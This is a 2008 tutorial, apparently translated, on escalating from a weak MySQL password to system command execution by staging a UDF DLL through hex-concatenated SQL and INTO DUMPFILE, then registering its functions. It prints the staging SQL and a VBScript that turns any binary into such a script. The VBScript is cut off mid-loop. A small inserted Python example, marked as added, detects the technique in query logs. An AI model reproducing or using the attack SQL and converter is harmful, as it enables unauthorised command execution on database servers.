How to obtain system privileges through a weak MySQL password
Add date: 10/08/2008   Publishing date: 10/08/2008
Page 1 of 4

Tutorials on obtaining a webshell through a weak MySQL password have been online for a long time. What I describe here is not obtaining a webshell but obtaining system privileges directly. Read that carefully: "directly"!

First, a brief outline of how a weak MySQL password leads to system privileges: a MySQL script is used to upload a UDF DLL file, then the self-written functions in that UDF DLL are registered, and arbitrary commands can then be executed.

The idea is very simple, and there are some tutorials online, but they either give code for one specific case or cover the whole thing in a few sentences, which makes them hard to follow for a beginner like me. After several days of persistent testing I finally got a result, and I am giving everyone the detailed process and the related code, so that everyone can write their own DLL file and generate the binary code for different files themselves!
Below, we first cover how to generate the upload script for a binary file. Take a look at this MySQL script (the method used by net user Mix):
set @a = concat('', 0x0123abc1312389 .....);
set @a = concat(@a, 0x4658978abc545e ......);
......................

create table Mix (data LONGBLOB); -- create table Mix with a single field, data, of type LONGBLOB
insert into Mix values (""); update Mix set data = @a; -- insert the contents of @a into table Mix
select data from Mix into DUMPFILE 'C:\\Winnt\\filename'; -- export the table contents as a file
The first two statements will be very familiar from earlier injection work as the way to get around the ' (single quote): the hex-encoded value is assigned to a variable, and the variable is then inserted. Here, though, the hex code is the content of a file and is far too long for one statement, so the concat function is used to keep appending each new chunk to what has already been accumulated in variable a. The remaining statements are very simple, and I have annotated them.
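
Seen from the defender's side, the statement sequence above leaves a recognisable trail in the MySQL general query log. The following is an added example, not part of the original article: it reassembles hex-built user variables and reports each SELECT ... INTO DUMPFILE that writes one to disk, noting whether the blob starts with a PE header. The log lines, the hex stub and the names `SAMPLE_LOG` and `find_binary_dumps` are constructed for illustration.

```python
import re

# Constructed sample of general-query-log statements (not taken from the page).
# The hex literals are a harmless stub that merely begins with the PE magic "MZ".
SAMPLE_LOG = [
    "set @a = concat('', 0x4D5A9000030000);",
    "set @a = concat(@a, 0x04000000FFFF);",
    "create table Mix (data LONGBLOB);",
    'insert into Mix values ("");',
    "update Mix set data = @a;",
    r"select data from Mix into DUMPFILE 'C:\\Winnt\\filename';",
    "select name from customers into outfile '/tmp/report.csv';",
]

SET_CONCAT = re.compile(r"set\s+(@\w+)\s*=\s*concat\s*\(\s*(''|@\w+)\s*,\s*0x([0-9a-f]+)", re.I)
UPDATE_VAR = re.compile(r"update\s+(\w+)\s+set\s+\w+\s*=\s*(@\w+)", re.I)
DUMPFILE = re.compile(r"from\s+(\w+)\s+into\s+dumpfile\s+'([^']+)'", re.I)

def find_binary_dumps(statements):
    """One finding per SELECT ... INTO DUMPFILE, with the size and type of any hex-built blob in the source table."""
    variables, tables, findings = {}, {}, []
    for stmt in statements:
        if m := SET_CONCAT.search(stmt):
            name, base, digits = m.groups()
            if len(digits) % 2:  # MySQL treats an odd-length hex literal as having a leading 0
                digits = "0" + digits
            prefix = b"" if base == "''" else variables.get(base.lower(), b"")
            variables[name.lower()] = prefix + bytes.fromhex(digits)
        elif m := UPDATE_VAR.search(stmt):
            tables[m.group(1).lower()] = variables.get(m.group(2).lower(), b"")
        elif m := DUMPFILE.search(stmt):
            blob = tables.get(m.group(1).lower(), b"")
            findings.append({
                "path": m.group(2),
                "bytes": len(blob),
                "pe_header": blob.startswith(b"MZ"),
            })
    return findings

if __name__ == "__main__":
    for finding in find_binary_dumps(SAMPLE_LOG):
        print(finding)
```

SELECT ... INTO DUMPFILE requires the FILE privilege, and the `secure_file_priv` server variable limits where such exports can be written.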

The last three statements are easy, but producing that much hex data by hand would be exhausting! Do you remember the exe2bat.vbs script from before, though? We can modify that script to generate the MySQL script we need. By comparing the format of the file that exe2bat.vbs produces with the format of the script we need, we can easily arrive at the script we want. The script content is as follows:
' the path of the file to convert is passed as the first argument
fp = wscript.arguments(0)
fn = right(fp, len(fp) - instrrev(fp, "\"))
' read the whole file as binary
with createobject("adodb.stream")
.type = 1: .open: .loadfromfile fp: str = .read: sl = lenb(str)
end with
sll = sl mod 65536: slh = sl \ 65536
' write the MySQL script to <file>.txt, starting a new concat statement every 128 bytes
with createobject("scripting.filesystemobject").opentextfile(fp & ".txt", 2, true)
.write "set @a = concat('', 0x"
for i = 1 to sl
bt = ascb(midb(str, i, 1))
if bt < 16 then .write "0"
.write hex(bt)
if i mod 128 = 0 then .write ");" + vbcrlf + "set @a = concat(@a,0x"